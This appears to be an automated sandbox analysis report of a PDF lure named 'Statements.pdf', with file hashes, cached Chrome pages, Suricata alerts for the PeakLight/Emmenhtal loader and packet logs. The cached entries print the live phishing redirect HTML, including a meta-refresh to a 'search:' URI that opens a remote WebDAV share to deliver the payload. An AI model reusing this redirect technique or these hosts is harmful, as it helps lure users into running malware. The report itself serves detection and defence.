SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 16:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9729102873908144
Encrypted:	false
SSDEEP:	48:85d3WTXy4p1H9idAKZdA19ehwiZUklqehr1ny+3:8izFS5y
MD5:	6342D42C74291D4B6DD10CF99247A718
SHA1:	F881EB3E789161A550CCA4B7C616878F49BDBB2C
SHA-256:	118C711A190CCBE7A64C06AD55697FE453693322BC6E43216B7BD51939370E29
SHA-512:	D67C3C0A0B6B8EDA0D26BE90D7A2E10CF049A1E06C4E10F0953335358172AB86B5CA9E6C269FA4330085C20CC674B748C935AEA5438D7D561E44B2EBECD5C787
Malicious:	false
Preview:	L..................F.@.. ...$+.,....~w=7.S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yb.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yo.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yo.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yo............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yp............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 16:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9902573227132656
Encrypted:	false
SSDEEP:	48:8Id3WTXy4p1H9idAKZdA1weh/iZUkAQkqehC1ny+2:8hzf9Ql5y
MD5:	DFF20865BD86C65AA1B67F038E12270C
SHA1:	441399971BFE4EE6FE9BCC808D7C453FDA8EF228
SHA-256:	F507CD635959EF9242D8771ECB152C76CB6700935040BDEA6AE2108B5A0443B4
SHA-512:	E60F8278839BF1A83109A9F865D04395DAD6253BB539F10EB6C08729470234823501706938504269422F57EF19FAABF6D95AA413C7197B7F455D6D36167772A3
Malicious:	false
Preview:	L..................F.@.. ...$+.,....B],7.S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yb.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yo.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yo.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yo............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yp............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.00359663061464
Encrypted:	false
SSDEEP:	48:8xGd3WTXy4psH9idAKZdA14tseh7sFiZUkmgqeh7sc1ny+BX:8xjzYnW5y
MD5:	6B72E0C4B1EA50201CC28A023A3A41A3
SHA1:	D1277C4DCB21B5009E6CC09DAD81D19FBA8AB153
SHA-256:	4C8D808E566F38DD4BB22D6F58E28EC53BA0B30684142E36218EA8CE5D119C1E
SHA-512:	013982C4FBB982C506A52F38579B635DDAC6319B29C608089141B12778030F76935F3C25D3EC9837411FE2C91FDB4A8EEB0FB8EB07ABADD9704ECEB21EF42099
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yb.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yo.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yo.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yo............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 16:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9892939916154786
Encrypted:	false
SSDEEP:	48:8fd3WTXy4p1H9idAKZdA1vehDiZUkwqeh+1ny+R:8kzcE5y
MD5:	6F0EE2DF1314D2425B9FAC92AD2D6E75
SHA1:	37533FEE349A13E44CE2E318198C0EAEB0D84A21
SHA-256:	A1495D5FAE4B244F87CC7D5BD1C5820C6455BC5FDAE87422CF48A369DF64D158
SHA-512:	5D51045C4D1D83FFECE4A34B1BDAB628BB35C1AA01AF09DF1F01272C1DAE1CEFEB641E30D3AD364E3BB61B84E00365B827B14DEB90F12AD675D073DE625C0855
Malicious:	false
Preview:	L..................F.@.. ...$+.,....H.#7.S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yb.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yo.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yo.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yo............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yp............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 16:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9767066089140997
Encrypted:	false
SSDEEP:	48:8xd3WTXy4p1H9idAKZdA1hehBiZUk1W1qehw1ny+C:8azs9Q5y
MD5:	27735662786335EB024A413878B1DE47
SHA1:	D41094134DC0518A633D751F3C72DAB41AD2C456
SHA-256:	588C46ABFAF4902E626CBB099991DD9A832FEC06A0C1D397A928C48314ACCE1D
SHA-512:	973CA686C69D9B4308B2D69E4F2E8F46979DDB54D4AFF028260EE07B9135562D5311C9C5B71A990AF970C19B0C606BE49789E891FC195CF235186340DC83F87F
Malicious:	false
Preview:	L..................F.@.. ...$+.,....<.57.S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yb.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yo.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yo.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yo............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yp............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 16:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9867132912560317
Encrypted:	false
SSDEEP:	48:8bd3WTXy4p1H9idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbW1ny+yT+:8AzCT/TbxWOvTbW5y7T
MD5:	923A187BA90528EB66BD13BCF371F04D
SHA1:	216C975484CE41B4F6DEF5A763D9AE4563513021
SHA-256:	A7E83641640DBD24D98D2EB1650DA7FBC627B523DE0E8EAB65C1D86E58404964
SHA-512:	A4035F4BBA28F09945BE185236CB661A8E1B405E21E208066101783210FAFEC89377BC52AB0AE7286D9985BAC67F38655614E079CF51A2D92876146508F7AC1E
Malicious:	false
Preview:	L..................F.@.. ...$+.,....(%.7.S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yb.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yo.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yo.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yo............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yp............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 200

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	194
Entropy (8bit):	5.132979967084833
Encrypted:	false
SSDEEP:	6:tzhqfKSEt9Y9MRJVCNOA1HTLNo3NC0MWXfGb:tqkSMxCrVT63NCL8Gb
MD5:	0E337EAB4582BB6BDCCC9DF995F3923B
SHA1:	57D26296FBC36F4701026C050AAB31AE2265A5B9
SHA-256:	49A84B0FE7AA5BCDE36A214C6A107A1D8C2B6451AE325C89CE2FA7028A12A105
SHA-512:	F3441F1793E0A475AD8A7FD60D9B4A3BEAF14A903D3015C481D9B912A2B0E74851F66EE18E11798E4132E23DDBF0F5652A741AA3D680DC11B16C51408789E5E9
Malicious:	false
URL:	https://desbullariamos.sa.com/Scanned.php
Preview:	<!DOCTYPE HTML>..<html lang="en-US">..<head>..<meta charset="UTF-8">..<meta http-equiv="refresh" content="0; url=https://desbullariamos.sa.com/Scanned.html" />..</head>..<body>..</body>..</html>

Chrome Cache Entry: 201

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	7584
Entropy (8bit):	7.771402547890117
Encrypted:	false
SSDEEP:	192:kwSfH4IraPynWHFxRJkWLY6LiCD7LG7b2yqQwPOFb:kwSP4IEynWxJk6H2gLWqPQF
MD5:	17956A7275630ED70C693A72B11E67F3
SHA1:	AA600A8D3F3026816674F7DCA1D1FAE6651AEDD6
SHA-256:	96E34D83AD7BBB7ECF150EA8DAC6544F9AB2A6FC7BD40D8300CF6D4CD7679DD2
SHA-512:	CAA7428CA8C5ADAA405FE6E95F64992482A590B6452EE94040E0BF80E1F167000609D9795281EDA3CED0C9CD00D489F620A44E8FCC4E9C4963590D4E245384F2
Malicious:	false
URL:	https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png
Preview:	.PNG........IHDR.............\r.f....pHYs...........~....RIDATx..]K.e.U.U]v.u.i..J.d....Et#!.p.....I&.e..H.!..d.#ELq.Hd..0...b......x.1....E.....zos.......>.{.kI.U].[...^....3.....&>....................... ...@............................ ...@............................ ...@............................ ...@........c+..666..M~t.j..S.......>r5.7_.....W...;..#..`..M~...4..R.....lx...vC.w.Q..%.&.i...\|]..)...>....A.Y=.&...../.VJ.m>.[.(.d..+.8^..".6........2.W....=d.@..pl.!....c..Go>..oc.....).>..G&..W.....$....n.c....%....$...... .`.............@.@.[}..?.'..~........U#.j..?...@..L..@. .............-\|.#..ct...n.O?{K. .....r.....w~r<.]..x...........}...%.....\|...z..s....+.ic.R.5....2..e....~......4........@.........H..jV.T.`.}..}..o0Ki.._7$pw...........T......-...P8A../......y......._...=.?.._J.-.O..O...........~..H.........f..{.........Vb..........6S`..7..D$..@;~..2..@..g...o...U...d.......TR...........1.sf..[..../..!x2.....&h$.?[.....^....../..k.....M?.k

Chrome Cache Entry: 202

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7584
Entropy (8bit):	7.771402547890117
Encrypted:	false
SSDEEP:	192:kwSfH4IraPynWHFxRJkWLY6LiCD7LG7b2yqQwPOFb:kwSP4IEynWxJk6H2gLWqPQF
MD5:	17956A7275630ED70C693A72B11E67F3
SHA1:	AA600A8D3F3026816674F7DCA1D1FAE6651AEDD6
SHA-256:	96E34D83AD7BBB7ECF150EA8DAC6544F9AB2A6FC7BD40D8300CF6D4CD7679DD2
SHA-512:	CAA7428CA8C5ADAA405FE6E95F64992482A590B6452EE94040E0BF80E1F167000609D9795281EDA3CED0C9CD00D489F620A44E8FCC4E9C4963590D4E245384F2
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs...........~....RIDATx..]K.e.U.U]v.u.i..J.d....Et#!.p.....I&.e..H.!..d.#ELq.Hd..0...b......x.1....E.....zos.......>.{.kI.U].[...^....3.....&>....................... ...@............................ ...@............................ ...@............................ ...@........c+..666..M~t.j..S.......>r5.7_.....W...;..#..`..M~...4..R.....lx...vC.w.Q..%.&.i...\|]..)...>....A.Y=.&...../.VJ.m>.[.(.d..+.8^..".6........2.W....=d.@..pl.!....c..Go>..oc.....).>..G&..W.....$....n.c....%....$...... .`.............@.@.[}..?.'..~........U#.j..?...@..L..@. .............-\|.#..ct...n.O?{K. .....r.....w~r<.]..x...........}...%.....\|...z..s....+.ic.R.5....2..e....~......4........@.........H..jV.T.`.}..}..o0Ki.._7$pw...........T......-...P8A../......y......._...=.?.._J.-.O..O...........~..H.........f..{.........Vb..........6S`..7..D$..@;~..2..@..g...o...U...d.......TR...........1.sf..[..../..!x2.....&h$.?[.....^....../..k.....M?.k

Chrome Cache Entry: 203

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	downloaded
Size (bytes):	359424
Entropy (8bit):	0.02939272356973856
Encrypted:	false
SSDEEP:	12:FF21pDgqunpDvZkzMxikhkIiIkISGzdkIiIkISd5kN:Fwbg79CzMxikiIqI1+IqIs6
MD5:	E1E71B27F4CA23F2E36460CD0F33495E
SHA1:	8CFB22DF6004A8D4105C55711462AD9CC26E8CAA
SHA-256:	75F161A3DD4D2F3220D1DEA6D727D9D9E4124F714F55FFDD66325D3F562ED6D3
SHA-512:	EFDB11C997A679A49D9388E86EE476CBCEC3145891E782F5C5A895A43956F56CD359EB048C9CBFEBFF100A4E54A79E8003769653F55E519B4E56EAD52D7A6F3A
Malicious:	false
URL:	https://desbullariamos.sa.com/Scanned.html
Preview:	<link rel="icon" href="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png">....<meta property="og:image" content="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"> .. <title>GKSA9MASKQVBA80HJSA</title>.... <meta http-equiv="refresh" content="0; URL=search:query=GKSA9MASKQVBA80HJSA&crumb=location:\\dbasopmagroup.forum@5498\DavWWWRoot\GKSA9MASKQVBA80HJSA&displayname=Downloads">.. .. .. .... <p><a href="search:query=GKSA9MASKQVBA80HJSA&crumb=location:\\dbasopmagroup.forum@5498\DavWWWRoot\GKSA9MASKQVBA80HJSA&displayname=Downloads">GKSA9MASKQVBA80HJSA </a></p>.. ....</body></html>.......................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PDF document, version 1.7, 1 pages
Entropy (8bit):	7.662377459197179
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	Statements.pdf
File size:	73'956 bytes
MD5:	eaf880556764d7865d9397ec49986abd
SHA1:	50ac5cc2959544ce66105d20504847339986a1ae
SHA256:	e495dc7dda97b75d4824d22b981905545098983da53307a3008d688854c2d752
SHA512:	09450538d3e832f9aee2369f980057eba1eba8e39a7e21cfd0b3139c06a2c24b9110f1b4f2730e13a114a44fb1f42bcdc6cec095ab27fc8e21add7c1330ebfa5
SSDEEP:	1536:gHd/8T0tGCmJ5d4n6hFmSQnDl4gr1Wl4U4tt4Lc/KvdDRypiMim:2N84tg9sumSQnJFU4t+LcOdDspz
TLSH:	4573A6138C5C86C6E16946E8BD571D9D3E0A6B0DEC8629FF752E4ECB3F106225C9902F
File Content Preview:	%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 12 0 R/MarkInfo<</Marked true>>/Metadata 26 0 R/ViewerPreferences 27 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 1/Kids[ 3 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/R

File Icon


Icon Hash:	62cc8caeb29e8ae0

Static PDF Info

General
Header:	%PDF-1.7
Total Entropy:	7.662377
Total Bytes:	73956
Stream Entropy:	7.660081
Stream Bytes:	70831
Entropy outside Streams:	5.348908
Bytes outside Streams:	3125
Number of EOF found:	2
Bytes after EOF:

Keywords Statistics

Name	Count
obj	17
endobj	17
stream	6
endstream	6
xref	2
trailer	2
startxref	2
/Page	1
/Encrypt	0
/ObjStm	1
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Image Streams

ID	DHASH	MD5	Preview
10	6c5e063b0b0f2f3f	a91658ef863e18b084030f57f63941ec

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-20T18:11:30.168418+0100	2058070	ET MALWARE Observed DNS Query to PeakLight/Emmenhtal Domain (desbullariamos .sa .com)	1	192.168.2.5	50540	1.1.1.1	53	UDP
2024-12-20T18:11:30.168542+0100	2058070	ET MALWARE Observed DNS Query to PeakLight/Emmenhtal Domain (desbullariamos .sa .com)	1	192.168.2.5	61816	1.1.1.1	53	UDP
2024-12-20T18:11:32.560460+0100	2058073	ET MALWARE Observed PeakLight/Emmenhtal Domain (desbullariamos .sa .com in TLS SNI)	1	192.168.2.5	49756	172.93.120.113	443	TCP
2024-12-20T18:11:32.560636+0100	2058073	ET MALWARE Observed PeakLight/Emmenhtal Domain (desbullariamos .sa .com in TLS SNI)	1	192.168.2.5	49757	172.93.120.113	443	TCP
2024-12-20T18:11:34.236493+0100	2058178	ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery Template Observed	1	172.93.120.113	443	192.168.2.5	49757	TCP
2024-12-20T18:11:34.236493+0100	2058179	ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery WebPage Observed	1	172.93.120.113	443	192.168.2.5	49757	TCP
2024-12-20T18:11:34.918209+0100	2058073	ET MALWARE Observed PeakLight/Emmenhtal Domain (desbullariamos .sa .com in TLS SNI)	1	192.168.2.5	49765	172.93.120.113	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 18:11:06.613131046 CET	49675	443	192.168.2.5	23.1.237.91
Dec 20, 2024 18:11:06.628760099 CET	49674	443	192.168.2.5	23.1.237.91
Dec 20, 2024 18:11:06.722503901 CET	49673	443	192.168.2.5	23.1.237.91
Dec 20, 2024 18:11:09.117024899 CET	443	49703	23.1.237.91	192.168.2.5
Dec 20, 2024 18:11:09.117130041 CET	49703	443	192.168.2.5	23.1.237.91
Dec 20, 2024 18:11:30.877952099 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:30.877989054 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:30.878062963 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:30.878961086 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:30.879065037 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:30.879146099 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:30.879391909 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:30.879406929 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:30.879730940 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:30.879764080 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.551748991 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.557018995 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.560460091 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.560467005 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.560636044 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.560695887 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.561326981 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.561398029 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.562123060 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.562203884 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.562942982 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.562994003 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.564476013 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.564568043 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.564654112 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.564660072 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.619718075 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.619739056 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:32.619766951 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:32.665218115 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.158799887 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.158873081 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.158947945 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.217817068 CET	49756	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.217827082 CET	443	49756	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.280009985 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.280054092 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.280144930 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.284981012 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.284996986 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.299702883 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.343360901 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.833336115 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.833368063 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.833376884 CET	443	49757	172.93.120.113	192.168.2.5
